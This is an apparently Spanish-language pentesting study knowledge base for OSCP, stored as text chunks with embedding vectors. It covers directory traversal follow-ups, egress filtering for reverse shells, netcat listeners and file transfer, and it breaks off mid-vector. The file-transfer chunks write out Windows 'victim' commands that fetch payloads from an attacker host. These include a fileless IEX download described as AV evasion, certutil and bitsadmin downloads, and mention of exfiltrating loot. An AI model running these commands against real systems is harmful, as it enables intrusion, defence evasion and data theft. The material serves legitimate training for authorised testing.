-0.02961, -0.05397, -0.01236, 0.05863, -0.0351, 0.03578, 0.02417, 0.11067, 0.06586, -0.05273, -0.09833, -0.00683, 0.00475, -0.08854, -0.08519, 0.03163, -0.04438, -0.07091, -0.04798, 0.07611, 0.01426, 0.03677, -0.04263, 0.05746, -0.05697, 0.00068, 0.0089, 0.04834, -0.09177, -0.1008, 0.03874, -0.05577, 0.09531, 0.13394, 0.03171, 0.04319, -0.03477, -0.01632, -0.02226, 0.07876, -0.00476, 0.0595, -0.05513, -0.01601, -0.00919, -0.05873, -0.01109, 0.05764, -0.05881, -0.0724, -0.07781, 0.01016, -0.01708, 0.00807, 0.07588, -0.02375, 0.02308, -0.01865, 0.03139, 0.00514, -0.02114, -0.04903, -0.01727, 0.02137, 0.04387, 0.00887, -0.00514, 0.00222, -0.01819, 0.0726, 0.02137, 0.03496, 0.03982, 0.09577, 0.03595, -0.00388, -0.13161, -0.08218, -0.00975, 0.01093, 0.09257, -0.06217, 0.01529, -0.04097, 0.01244, 0.01638, -0.00775, -0.04617, 0.01746, -0.01544, 0.01537, 0.00821, 0.05291, -0.05662, -0.02669, -0.04264, -0.0574, 0.07159, 0.00751, -0.00562, 0.00949, -0.05349, -0.0861, 0.01287, -0.01687, 0.01273, -0.07715, -0.00028, -0.02569, 0.04155, -0.01612, 0.06078, 0.03603, -0.0377, -0.00151, 0.02768, 0.02188, 0.02447, -0.02004, 0.07988, 0.018, -0.00112, 0.03761, 0.03158, 0.03979, 0.01368, -0.04422, 0.00052, -0.02879, -0.0629, 0.04778, -0.01137, -0.02605, 0.02831, 0.00476, 0.00904, 0.02262, -0.02368, 0.02771, 0.01966, -0.0525, 0.06425, -0.02994, -0.00631, 0.00826, 0.01517, 0.02839, 0.02383, -0.06301, -0.01267, 0.0722, -0.01559, 0.03047, 0.01968, 0.0029, 0.04176, 0.00661, 0.02534, 0.04279, -0.08931, -0.00816, -0.02782, -0.05042, 0.03411, 0.00394, -0.00496, -0.01405, -0.0435, -0.01455, 0.02353, -0.0052, 0.00889, -0.08079, -0.0284, -0.02754, -0.07382, -0.02376, 0.0495, -0.00813, -0.01872, -0.00551, -0.01288, -0.07317, -0.01196, 0.00436]} +{"tipo": "metodologia", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "texto": "## Siguiente paso\n- Lees `id_rsa` → SSH como ese usuario.\n- Lees código/config → credenciales → Authentication attacks / reutilización.\n- Si además se **incluye** (PHP) → escala a LFI a RCE.\n\nRelacionado: LFI a RCE · Burp Repeater e Intruder · OSCP MOC", "v": [-0.22113, -0.1713, -0.10495, -0.033, 0.20096, -0.30319, -0.00247, -0.13029, -0.04451, 0.0836, -0.18341, -0.10145, 0.03886, -0.14262, 0.16138, -0.00154, -0.14451, 0.11473, -0.04931, -0.09267, -0.02163, -0.02152, -0.06018, 0.05586, 0.10423, 0.11352, 0.05693, -0.04853, 0.05772, -0.11155, 0.07352, 0.04779, 0.02549, 0.04393, -0.12376, -0.02686, -0.01909, -0.02749, 0.00497, 0.14708, 0.02726, 0.10136, -0.13157, 0.1224, 0.12313, -0.09814, 0.03263, 0.08092, 0.09416, 0.00978, 0.01721, -0.05832, -0.16348, -0.00336, 0.06127, 0.06929, 0.09947, -0.06605, -0.02686, 0.00797, -0.02306, 0.0563, -0.02275, -0.13777, 0.0042, -0.00927, 0.03653, -0.04531, -0.01646, 0.01528, -0.06889, 0.01188, -0.11439, -0.07131, 0.02184, 0.00973, 0.0583, -0.00312, 0.1852, 0.01414, -0.04529, -0.01224, -0.03101, -0.07285, 0.00839, 0.02273, 0.05335, -0.10805, 0.00427, 0.00109, 0.08554, 0.02704, -0.01593, -0.01491, 0.06135, -0.07192, -0.01207, -0.04373, -0.04211, -0.05256, -0.03509, 0.05204, 0.01208, 0.01937, 0.1195, -0.0371, 0.09784, 0.03095, 0.05835, -0.04497, 0.06644, -0.03496, -0.05097, -0.02311, -0.0504, 0.00176, 0.03763, -0.0453, -0.02626, -0.08116, -0.06019, 0.00373, -0.02128, -0.0455, 0.02333, 0.08733, -0.01382, 0.04223, -0.01709, -0.02443, -0.07019, -0.06645, 0.04214, 0.02415, 0.00017, -0.03484, 0.02707, 0.00222, 0.00529, 0.0102, -0.01179, 0.02918, 0.04923, 0.09273, 0.07052, 0.00574, 0.00861, -0.08387, -0.03104, 0.01035, 0.04388, 0.10368, 0.00105, 0.00512, -0.00354, -0.02054, -0.01409, -0.01787, -0.07699, 0.04258, 0.01598, 0.02942, 0.0196, 0.0573, 0.01802, 0.00899, 0.01422, -0.03078, 0.03091, -0.00134, 0.03115, 0.00473, -0.03281, -0.00215, 0.02124, -0.038, 0.0489, -0.02686, -0.03612, -0.0322, 0.00694, -0.04392, 0.05337, 0.05022, -0.00492, -0.04949, 0.00781, 0.03056, -0.03975, -0.06132, -0.02235, 0.01501, 0.04634, 0.02723, 0.01406, -0.02449, -0.01463, -0.08097, -0.00525, -0.00621, -0.04335, -0.00499, -0.00922, -0.02081, 0.02581, -0.00121, 0.0531, 0.01238, -0.00348, -0.01625, 0.02186, -0.0423, 0.05557, -0.04467, 7e-05, -0.04469, 0.00615, 0.07986, 0.03383, 0.00913, -0.02797, 0.03295, 0.01851, 0.00986, 0.02105, -0.00635, 0.00878, -0.02036, 0.01562, 0.00558, 0.00944, -0.00574, 0.01455, 0.00453, 0.00183, 0.02524, -0.02327, 0.00502, -0.02233, -0.02703, 0.01117, -0.04529, 0.0351, -0.07175, -0.02438, -0.00339, -0.03483, -0.02915, 0.04202, 0.01211, 0.00085, 0.01524, -0.05246, -0.10012, -0.03989, 0.01678]} +{"tipo": "metodologia", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "texto": "# Egress filtering\n\n> El firewall del **objetivo** bloquea ciertos puertos de salida → tu Reverse shell no conecta y crees que el exploit falló.", "v": [0.0706, 0.00797, -0.14119, -0.14783, 0.0044, -0.07514, 0.01194, 0.00191, 0.03284, -0.06972, -0.14108, -0.00164, -0.0065, 0.04246, 0.05021, -0.10598, -0.12144, 0.00587, -0.05449, -0.11324, -0.12217, 0.00567, -0.01057, -0.04401, -0.00349, 0.08592, -0.13002, 0.129, -0.06856, -0.09951, 0.04411, -0.03698, 0.09959, -0.10114, 0.05765, -0.05492, 0.0166, 0.07814, 0.11518, 0.02491, -0.01048, -0.01515, -0.13333, -0.01387, 0.06465, -0.16799, -0.02806, -0.01367, 0.14399, 0.05964, -0.07267, -0.03867, -0.19478, 0.05675, 0.07809, 0.00183, 0.16964, 0.01806, 0.03972, 0.00234, -0.15604, -0.02261, 0.01249, -0.07981, 0.04722, -0.11255, -0.0429, -0.0314, -0.09491, 0.06103, -0.01712, -0.01307, 0.00296, -0.03902, 0.06147, -0.02448, 0.03646, 0.03361, 0.05953, 0.09499, -0.07036, -0.09438, 0.00071, -0.03015, -0.10652, -0.02559, -0.11954, -0.11477, -0.08935, -0.10621, 0.04275, -0.02079, -0.1115, -0.05634, 0.00824, -0.04115, -0.02429, 0.11794, -0.0405, -0.02735, 0.00332, 0.02003, -0.05012, 0.13158, 0.05163, -0.01124, 0.01414, -0.08981, 0.05888, 0.01162, -0.03811, -0.05648, 0.02814, -0.12026, -0.02916, -0.04718, -0.07325, -0.08912, 0.08402, -0.04639, -0.07481, -0.1202, -0.06805, -0.03293, 0.01715, 0.01222, -0.05578, 0.05528, 0.03918, -0.02602, -0.06841, 0.04512, -0.09131, -0.02369, -0.15183, -0.015, 0.00327, -0.06551, -0.01397, -0.04659, 0.03292, 0.03511, 0.00323, 0.03524, 0.04042, -0.02292, -0.0187, -0.05829, -0.10676, 0.01168, 0.02183, 0.0392, -0.09358, 0.03983, -0.07984, 0.00801, 0.04499, -0.04997, 0.00712, 0.10911, 0.02403, 0.01714, -0.01375, 0.07506, -0.00852, -0.0073, -0.07351, -0.02372, 0.04234, 0.00685, -0.03162, 0.05169, -0.02106, -0.05641, -0.05975, -0.0381, -0.01566, -0.03037, 0.02423, -0.03005, -0.00819, 0.01238, 0.00019, -0.0436, -0.07631, -0.02811, 0.00283, -0.02789, 0.03831, 0.08899, 0.00798, -0.01192, -0.06064, -0.04439, -0.01863, -0.05009, -0.05606, -0.07485, 0.07464, 0.01637, -0.03968, 0.01374, 0.06675, -0.11661, 0.03989, 0.0179, -0.05601, -0.01773, 0.00519, 0.01196, 0.0863, -0.02153, 0.03667, -0.02925, -0.06152, 0.02941, 0.01629, 0.02372, 0.05869, 0.0853, -0.02202, 0.09692, 0.01298, 0.06741, -0.0298, 0.01683, 0.00327, -0.01535, 0.04148, -0.00832, -0.02544, -0.02747, -0.06904, 0.00177, 0.0175, 0.02394, -0.04, -0.00487, -0.00859, -0.05745, -0.0134, -0.02294, 0.0424, -0.08783, 0.01628, -0.04535, -0.01614, 0.07274, 0.0519, -0.0315, -0.03404, 0.03328, -0.01218, -0.05539, 0.03703, 0.00382]} +{"tipo": "metodologia", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "texto": "## Qué probar (puertos de salida)\n```\n80, 443, 8080, 53, 4444\n```\n- Si **ninguno** funciona → considera una shell por **ICMP** o canal DNS.\n- 53 (DNS) y 443 suelen estar permitidos casi siempre.", "v": [0.02517, -0.03434, -0.01485, -0.02954, 0.03046, -0.21477, -0.01698, -0.02131, -0.07428, 0.06435, -0.03155, -0.11157, -0.03661, -0.23087, -0.12015, -0.04201, -0.03398, -0.02717, 0.01896, 0.03963, -0.1555, -0.02199, -0.1394, -0.0447, 0.00603, 0.07669, -0.07054, 0.01255, -0.11496, 0.00267, 0.04542, -0.14863, 0.0589, -0.0222, -0.02697, -0.09772, -0.13529, 0.05168, 0.07121, 0.13449, 0.02068, 0.07915, -0.09765, -0.00914, 0.11804, -0.05128, -0.02626, -0.07542, 0.05034, -0.17643, -0.08215, -0.01889, -0.08439, 0.03192, -0.03615, 0.08672, 0.09537, 0.01581, 0.02674, -0.03633, -0.07704, -0.02548, -0.04944, -0.0208, 0.13098, -0.12961, 0.04026, -0.06262, -0.18226, 0.00436, 0.00488, 0.02907, -0.02628, 0.02502, 0.09456, -0.05178, 0.01785, -0.08712, 0.14893, 0.03503, 0.09367, -0.06058, -0.06917, -0.06405, -0.08775, -0.04058, -0.01126, -0.0898, -0.08875, -0.09968, 0.09368, 0.0189, 0.05846, 0.12029, 0.05022, 0.02564, 0.06002, 0.08221, -0.01023, -0.00843, 0.09909, 0.18399, -0.0725, 0.08783, 0.04654, 0.03411, 0.04889, -0.07412, 0.05099, 0.05708, -0.0443, 0.03312, -0.0486, -0.03683, 0.03753, 0.01443, -0.0666, 0.01196, 0.0203, 0.02074, -0.00703, -0.06231, -0.05343, 0.05391, 0.00794, -0.01404, -0.01578, 0.03558, -0.00189, -0.01308, 0.05755, -0.04492, -0.05219, -0.01416, 0.02679, 0.02902, 0.08257, -0.04047, -0.01791, -0.05335, 0.02183, 0.03048, -0.07265, -0.04203, 0.10191, 0.02444, 0.03108, -0.04242, -0.07625, 0.04498, 0.01841, 0.12061, -0.0271, 0.02898, -0.02543, 0.00928, 0.06086, -0.0715, -0.0674, 0.05695, 0.02319, 0.05377, 0.03597, 0.05187, -0.00351, 0.03751, -0.05944, -0.03336, 0.05859, -0.03905, -0.01996, 0.07744, -0.08953, -0.10731, -0.00586, -0.05015, -0.04977, -0.05265, 0.00971, -0.01262, 0.01463, -0.05263, 0.01912, -0.0333, -0.03707, -0.04502, 0.07108, -0.01928, -0.00945, 0.00116, 0.05605, 0.05498, -0.05571, -0.00906, -0.01991, 0.04987, -0.01608, -0.13411, -0.02894, -0.0307, -0.02178, -0.01303, 0.10084, -0.05709, -0.05675, -0.0156, -0.04298, 0.02843, -0.02149, 0.02672, -0.00228, -0.0894, 0.03151, -0.00878, -0.09386, 0.03079, 0.0377, 0.01162, -0.01242, 0.04246, -0.02646, 0.03311, 0.00476, 0.05169, 0.05587, -0.00801, 0.03739, -0.02638, 0.06377, 0.01287, 0.02767, 0.05534, -0.02701, -0.07444, 0.01253, -0.02816, 0.01245, -0.02531, -0.02501, -0.04888, 0.03076, 0.0015, -0.04281, -0.01205, 0.02808, -0.03006, -0.01351, -0.00407, -0.00747, -0.01956, -0.00317, -0.02112, 0.04822, -0.04089, 0.02604, -0.00959]} +{"tipo": "metodologia", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "texto": "## Listener correcto según objetivo\n```\nnc clásico → víctima Linux\nncat --ssl → evadir IDS\nstty raw -echo+nc → Windows ConPtyShell\n```", "v": [-0.16787, -0.08131, -0.06816, -0.04786, -0.05853, -0.23956, -0.16981, -0.06558, 0.04199, 0.11969, -0.04455, -0.1823, 0.00477, -0.09912, -0.06852, -0.08072, 0.00141, 0.00941, 0.04755, -0.02186, -0.21597, -0.05787, -0.11133, -0.05837, 0.08203, 0.08634, -0.16408, 0.19464, 0.02899, 0.06894, -0.06296, -0.01687, -0.09243, 0.02528, -0.00956, 0.07897, -0.08784, -0.01556, 0.01226, 0.1452, 0.1014, 0.01495, -0.08831, 0.0412, 0.03701, -0.22369, 0.10283, -0.08535, 0.10551, -0.10643, -0.00741, -0.05628, -0.18623, -0.08791, -0.00798, -0.04072, 0.05166, 0.00265, 0.05665, -0.0501, -0.09593, 0.02313, -0.02952, 0.02019, 0.00678, -0.04187, 0.07005, -0.10226, -0.09108, 0.03595, -0.01973, -0.02988, -0.00482, -0.08327, 0.09825, -0.02109, 0.00798, -0.0216, 0.12917, 0.01118, -0.01133, -0.07502, 0.01536, -0.07016, -0.13301, 0.00606, 0.09601, -0.06679, 0.00284, 0.02454, 0.09004, -0.04125, -0.02289, 0.02822, 0.11564, -0.12106, 0.01796, 0.03525, 0.03022, -0.06347, -0.00318, -0.04993, -0.05731, 0.02821, 0.03235, 0.05025, 0.01123, -0.02867, 0.00077, -0.04813, 0.11313, 0.0206, 0.03466, -0.03906, -0.00711, -0.01694, -0.05485, -0.03803, -0.00301, 0.0203, -0.01435, 0.0284, -0.03185, 0.00822, -0.02572, 0.02231, -0.0239, 0.08912, -0.06306, -0.017, 0.04905, -0.03823, -0.01308, -0.00447, -0.02363, 0.06844, 0.06533, -0.09236, 0.00723, -0.02722, 0.01388, 0.07617, 0.03629, 0.0614, 0.08866, -0.03829, 0.0253, -0.07929, 0.0016, -0.03537, 0.08504, 0.02584, -0.07229, -0.04714, -0.07539, -0.03526, -0.00312, -0.011, 0.02578, -0.01112, -0.0134, 0.03917, 0.0187, 0.02234, -0.01347, -0.03634, 0.00671, -0.03898, 0.05893, -0.05655, 0.06393, 0.02197, 0.0272, -0.09996, -0.03971, -0.07709, 0.11683, -0.04132, 0.02795, 0.00013, -0.03478, 0.00101, 0.0051, 0.00265, 0.01385, -0.03345, -0.01271, -0.01368, 0.00436, 0.05481, -0.00082, -0.02459, -0.01656, -0.07433, 0.01694, -0.01882, -0.05136, -0.00443, -0.01511, 0.01345, -0.10146, -0.00442, 0.04822, -0.08134, 0.07553, 0.04647, 0.0033, -0.00559, -0.05604, -0.01054, 0.06479, -0.01573, 0.04048, -0.013, -0.01693, -0.05161, -0.03538, 0.02076, 0.00791, -0.00874, -0.04764, 0.02633, -0.00069, -0.0072, 0.02175, -0.01733, 0.00489, 0.00966, 0.00642, -0.04524, -0.03797, 0.03131, 0.00098, -0.00214, 0.03429, -0.0106, 0.02149, 0.02697, -0.02607, -0.00197, 0.01093, 0.04712, -0.01465, -0.02312, 0.00387, -0.0164, -0.00514, 0.01789, 0.00991, -0.01199, 0.00395, -0.02449, -0.06273, -0.06294, -0.04543, -0.01185]} +{"tipo": "metodologia", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "texto": "## Regla\nDescubre el egress **pronto** (Gestión del tiempo): perder 2h pensando que el exploit no va, cuando es el firewall, es clásico.\n\nRelacionado: Reverse shell · Puesto de mando Kali · OSCP MOC", "v": [-0.30755, -0.07919, 0.07496, -0.12076, -0.10206, -0.10502, -0.05461, 0.05665, 0.04156, -0.03287, -0.02447, -0.08157, 0.04631, 0.00899, 0.02986, 0.07275, -0.02621, 0.10493, -0.03202, -0.06658, -0.091, -0.05783, -0.00043, -0.06325, 0.10747, 0.11851, 0.01737, 0.06535, -0.11669, -0.10017, -0.01521, -0.04714, -0.04156, -0.08639, -0.03909, 0.03078, -0.01399, 0.05511, 0.06356, 0.1076, -0.03529, 0.12135, -0.15215, 0.11193, 0.1678, -0.20179, 0.05163, 0.02847, 0.0553, 0.08749, -0.0684, -0.12265, -0.07201, 0.00817, 0.09417, 0.05183, 0.14759, 0.04687, -0.07709, -0.12092, -0.09869, -0.02724, -0.00971, -0.02308, 0.02753, -0.1212, 0.00736, -0.01484, -0.10297, 0.06977, -0.09456, 0.07132, -0.11409, -0.0269, -0.00326, -0.0898, 0.06994, 0.0364, 0.12549, 0.07579, -0.0401, -0.10304, 0.00264, -0.02877, -0.07197, -0.09569, 0.02739, -0.12801, -0.10178, 0.02578, 0.05445, -0.02678, -0.12204, 0.04709, 0.08009, -0.06715, -0.01207, 0.03553, -0.01453, 0.09069, -0.07335, 0.0713, -0.05598, 0.06554, -0.0059, 0.03435, 0.0967, -0.03949, 0.11669, 0.05386, -0.05582, -0.05748, 0.00402, -0.03848, 0.02623, 0.04454, -0.01679, -0.03521, 0.06532, -0.02087, -0.03851, -0.0117, -0.00436, -0.01547, -0.03084, -0.00631, -0.00395, 0.02792, 0.01391, 0.03572, -0.05718, -0.0878, -0.03195, -0.01836, -0.07147, 0.03625, 0.0357, 0.00145, -0.06135, -0.1203, 0.04316, 0.0478, 0.0068, 0.05794, 0.09085, 0.02226, 0.02563, -0.04707, -0.07345, 0.02661, -0.02946, -0.00036, -0.03079, 0.08467, -0.03699, -0.03376, -0.00821, 0.01582, -0.02691, 0.03209, 0.04508, 0.04646, 0.01869, 0.03236, 0.02854, -0.03109, -0.02663, 0.00242, -0.01261, 0.01986, -0.00618, 0.02712, -0.036, -0.03954, -0.07401, -0.12518, 0.00239, -0.01186, 0.01644, 0.00368, 0.0252, -0.04235, -0.01647, 0.08355, 0.00065, -0.04808, 0.04627, 0.02925, -0.02943, 0.06846, 0.05348, -0.04515, 0.04634, 0.01415, -0.03366, -0.02712, 0.01893, -0.10574, -0.06036, 0.03454, -0.03384, -0.06874, 0.0028, -0.02869, -0.03131, -0.00399, -0.01714, 0.01335, 0.00574, 0.01595, 0.03585, 0.0213, 0.06407, 0.02394, -0.03448, 0.0183, 0.02032, 0.06389, 0.04131, 0.00239, -0.03179, 0.04184, 0.00872, 0.02028, -0.0051, -0.00714, -0.01613, 0.02508, 0.00083, -0.03266, -0.0531, -0.00288, 0.00838, -0.04959, 0.04132, -0.0222, 0.01228, -0.06593, 0.01154, -0.06515, 0.02422, -0.00309, 0.04181, -0.00869, -0.0764, -0.00069, -0.04185, -0.04017, -0.00483, -0.03573, -0.05224, -0.03719, -0.00911, -0.0845, 0.01801, -0.01153]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "# Transferencia de ficheros\n\n> **Subes** tools a la víctima y **exfiltras** loot. Montado en el Puesto de mando Kali. Matriz completa: oscp.trastero.org/filetransfer.", "v": [-0.01705, -0.12475, -0.16479, -0.09715, -0.06916, -0.02569, 0.05584, 0.0161, -0.07551, 0.05921, -0.08597, -0.05829, 0.10302, -0.01103, 0.05256, -0.0129, 0.10738, -0.07992, 0.04266, -0.12625, -0.04298, -0.00352, -0.02668, -0.17208, 0.01185, 0.11327, 0.01421, -0.08865, -0.17047, 0.07622, 0.07198, -0.09259, -0.05481, 0.06816, 0.09029, -0.08851, -0.00109, -0.03404, 0.08358, 0.0624, 0.17405, 0.10554, -0.10104, 0.12277, 0.02792, -0.19599, -0.02485, 0.09867, 0.15571, 0.03062, 0.13463, -0.15513, -0.20907, -0.07746, -0.00854, -0.12672, 0.16802, -0.0303, 0.06966, -0.00132, 0.0112, 0.01081, -0.10035, 0.01012, 0.00191, -0.10605, 0.10175, -0.0106, -0.09839, 0.06366, 0.03561, 0.12456, 0.01086, -0.01319, -0.1272, -0.13191, 0.04633, -0.01953, 0.06331, 0.02392, -0.06141, -0.05891, -0.06988, -0.08006, -0.03004, -0.02339, 0.07575, -0.02061, 0.03758, -0.0822, 0.09648, -0.02061, -0.02779, 0.00436, 0.07131, -0.04195, -0.03014, -0.01879, 0.05558, -0.04689, 4e-05, 0.03636, -0.00825, 0.05928, -0.03344, 0.03569, -0.03271, 0.01471, 0.05892, -0.05062, 0.01646, 0.06088, 0.10708, 0.00519, 0.03122, -0.00291, -0.00261, 0.04924, -0.00375, -0.02675, -0.02797, -0.01704, 0.05862, 0.03069, -0.00704, -0.08231, -0.06963, -0.01383, 0.03444, 0.02806, 0.01005, -0.00961, -0.10925, -0.06536, 0.01798, -0.07305, 0.10188, 0.04027, -0.00469, -0.03304, 0.01641, -0.00485, -0.01793, 0.01075, -0.00438, 0.04313, 0.04933, 0.01004, -0.0133, -0.0355, 0.08102, 0.02765, 0.00767, 0.07748, -0.01046, -0.03458, -0.02345, -0.06352, -0.10726, -0.04387, -0.00706, -0.00288, 0.06098, -0.02532, -0.02723, 0.02322, 0.08218, -0.0285, 0.01155, -0.01798, -0.01421, -0.03233, 0.04556, -0.0278, -0.00727, -0.11664, 0.01715, -0.07933, 0.0043, 0.01584, 0.01521, 0.08028, 0.04656, 0.06114, 0.01757, 0.00056, 0.039, -0.03163, -0.01656, 0.04321, 0.01719, 0.01686, -0.02769, 0.04421, -0.00028, 0.0172, -0.06322, -0.03259, -0.00274, 1e-05, -0.05912, 0.02668, 0.01859, -0.07019, -0.02523, 0.0104, -0.03476, -0.05374, -0.07652, 0.04248, 0.02406, 0.00051, 0.07643, -0.03014, -0.06098, 0.03111, -0.00937, 0.05427, 0.02444, 0.0126, -0.07318, 0.02313, 0.05231, -0.03963, -0.0249, 0.06038, 0.03662, 0.00195, -0.01267, 0.02603, -0.0163, 0.03246, 0.04566, -0.06759, 0.02268, 0.00073, -0.0532, -0.01096, -0.04465, -0.00609, -0.00641, -0.02802, -0.0415, -0.00951, -0.0514, 0.01869, -0.04503, 0.03516, 0.03457, -0.0506, 0.02034, -0.03238, 0.01555, -0.10196, 0.01518, -0.03363]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "## Servidores en tu Kali\n```bash\npython3 -m http.server 7788 # HTTP\nimpacket-smbserver -smb2support SERVER $(pwd) # SMB (anónimo)\nimpacket-smbserver -username u -password p -smb2support SERVER $(pwd) # SMB con auth\npython3 -m pyftpdlib --user=u --password=p -w -p 21 # FTP\nphp -S 0.0.0.0:7788 # PHP\n```", "v": [0.08785, -0.21811, -0.10637, -0.18532, -0.09212, -0.19158, -0.09545, -0.24719, 0.00212, 0.11478, -0.08305, 0.1541, 0.18883, -0.2, -0.18181, 0.00839, -0.13825, -0.09752, 0.07401, 0.09386, 0.15257, 0.1543, -0.07423, -0.09519, 0.01461, 0.13758, 0.04579, 0.09265, -0.06823, -0.03661, 0.07079, -0.06, -0.05364, 0.06133, -0.0478, -0.00194, 0.03245, 0.06324, 0.02069, 0.19267, -0.02363, -0.02186, 0.04046, 0.07451, 0.00909, 0.01599, 0.00741, -0.02574, 0.06011, -0.01643, -0.07692, -0.05345, -0.14227, -0.00557, -0.06756, -0.00357, 0.11828, -0.10837, -0.03002, 0.06148, -0.09323, -0.00129, -0.0097, -0.04217, 0.05861, -0.0402, 0.01675, -0.02545, -0.0911, 0.13284, -0.0814, -0.01127, 0.04934, -0.0243, 0.06616, 0.01365, 0.01683, -0.00634, 0.04355, 0.06079, -0.04891, -0.07463, -0.02706, 0.01312, -0.07368, -0.12069, 0.02192, 0.00531, 0.05192, -0.00636, 0.09993, 0.05334, -0.01556, 0.04815, -0.06186, -0.05656, -0.02113, -0.01458, 0.04272, -0.04982, -0.03143, 0.04288, 0.02082, 0.00331, 0.02545, -0.04167, 0.04776, 0.06387, -0.0369, -0.0277, 0.13626, -0.00204, 0.00908, 0.00314, -0.03861, -0.0463, 0.00668, -0.03229, 0.02617, -0.02837, -0.02395, -0.02238, -0.02093, 0.02036, -0.02828, 0.00552, 0.08339, 0.04409, -0.02803, -0.03578, -0.02647, -0.02021, 0.01, -0.01599, -0.00433, 0.08037, 0.03127, -0.04359, -0.04962, 0.08474, -0.08416, 0.02222, -0.0293, 0.07302, 0.06539, 0.00386, 0.02867, -0.07146, -0.04476, -0.02268, 0.06041, 0.00161, -0.01895, -0.0358, -0.00122, -0.00135, -0.02482, -0.02589, -0.0505, 0.04278, 0.02371, 0.05188, 0.03103, 0.03031, -0.03436, -0.06902, 0.00203, -0.03917, 0.06844, -0.09191, -0.00754, 0.02798, 0.00677, -0.06056, 0.04951, -0.08058, 0.0193, -0.00991, -0.03783, -0.00276, 0.01572, -0.01533, -0.00582, 0.01731, 0.00816, -0.02018, 0.04169, 0.00519, -0.00507, -0.06227, 0.02156, 0.01431, -0.05227, 0.02362, 0.03311, 0.00131, 0.0003, -0.03554, -0.01207, -0.04438, -0.01784, 0.01338, -0.03474, -0.01148, -0.00454, -0.01919, -0.00514, 0.01084, -0.02173, -0.06856, 0.00625, -0.03475, 0.02988, -0.04623, -0.00687, -0.03128, -0.04063, 0.06028, 0.006, -0.04118, -0.05957, 0.01979, 0.02554, -0.01612, -0.0118, -0.0346, -0.0014, -0.05183, 0.01103, -0.01336, -0.02845, 0.00162, -0.00161, 0.00356, 0.05922, -0.0214, -0.03165, -0.01623, -0.02666, 0.00395, -0.03628, -0.02047, -0.0098, -0.026, -0.02113, 0.01427, -0.01924, -0.04074, -0.01976, 0.03414, -0.03033, -0.06307, -0.09033, -0.0692, -0.04881, 0.03267]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "## Descargar EN la víctima Windows\n```powershell\n(New-Object Net.WebClient).DownloadFile('http://TU_IP/f.exe','C:\\Windows\\Temp\\f.exe')\nInvoke-WebRequest http://TU_IP/f.exe -OutFile f.exe # iwr\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/x.ps1') # fileless → AV evasion\nbitsadmin /transfer job http://TU_IP/f.exe C:\\Temp\\f.exe\ncertutil.exe -urlcache -split -f \"http://TU_IP/f.exe\" f.exe # LOLBin clásico\ntftp -i TU_IP get f.exe # (DISM /online /Enable-Feature /FeatureName:TFTP)\n```\n```cmd\nnet use x: \\\\TU_IP\\SERVER /user:u p & copy x:\\f.exe . # vía SMB\n```", "v": [-0.15809, -0.08942, -0.13643, -0.09388, 0.16534, -0.16626, -0.02824, -0.05518, 0.03039, 0.08734, -0.07188, -0.03578, -0.06523, 0.01183, -0.0411, -0.0214, 0.03089, -0.11276, 0.11357, -0.12091, 0.01762, 0.13139, -0.15095, -0.0369, 0.02998, 0.19385, -0.22602, 0.07902, -0.0532, -0.14928, 0.0311, -0.04392, 0.00381, -0.05344, -0.0065, -0.04097, 0.04334, -0.01758, 0.03508, 0.13667, 0.12778, 0.09308, -0.17952, 0.11088, 0.04076, -0.04656, 0.06097, -0.03066, 0.14972, -0.05318, 0.01728, -0.10182, -0.04045, -0.0235, -0.00664, -0.0437, 0.14786, -0.09667, -0.02018, 0.01959, -0.0108, 0.09062, -0.04429, -0.08117, 0.06383, -0.02897, 0.0703, -0.02224, -0.08907, 0.01492, -0.03318, 0.02936, -0.01826, -0.05091, 0.01929, -0.11953, -0.01824, -0.13578, 0.13087, 0.03121, -0.02848, 0.0548, -0.10539, -0.08138, -0.07889, -0.06545, 0.04685, -0.12005, 0.00188, -0.07723, 0.10091, 0.02626, -0.04219, 0.07059, 0.1154, -0.11928, 0.04606, 0.04239, 0.04182, 0.04021, -0.01125, 0.04424, -0.06832, 0.07735, 0.04806, -0.01376, 0.04404, 0.04449, -0.04501, 0.01451, 0.01768, 0.03089, 0.00313, -0.03814, -0.02456, -0.0704, -0.08687, -0.01265, -0.02148, 0.00358, -0.06036, -0.07253, -0.02255, 0.01589, -0.07215, -0.06126, -0.01695, 0.09588, -0.04137, -0.04608, 0.0299, -0.07115, -0.0041, -0.02299, 0.00245, 0.00634, 0.02456, 0.01587, 0.0006, -0.00829, 0.1018, 0.00893, -0.01319, 0.09447, 0.05791, -0.02617, 0.0313, -0.03084, 0.00407, -0.01625, 0.12402, -0.00978, -0.00796, 0.03422, -0.04794, -0.00176, -0.02586, 0.03721, 0.02788, -0.015, 0.01345, 0.0497, 0.0342, 0.03129, -0.01515, 0.01952, -0.02005, 0.02315, 0.04583, -0.01586, -0.02773, 0.04457, -0.04023, -0.07857, -0.00839, -0.09959, 0.05926, -0.06754, 0.03693, -0.04288, -0.01861, -0.07202, 0.07026, 0.05422, -0.03511, -0.01675, 0.02205, 0.00962, -0.08748, 0.02502, 0.00103, 0.02045, -0.06001, -0.02952, 0.0495, -0.0257, -0.05188, -0.05123, 0.03446, -0.02444, -0.09524, -0.04046, 0.0028, -0.04628, 0.0569, -0.00477, -0.01335, 0.01139, -0.02833, 0.03092, 0.04503, 0.02777, 0.00715, -0.049, -0.01819, -0.00868, 0.06726, 0.02871, 0.00787, 0.01839, -0.03907, 0.02794, 0.05463, -0.00796, -0.0112, 0.00663, 0.02622, -0.00452, -0.00347, -0.00377, 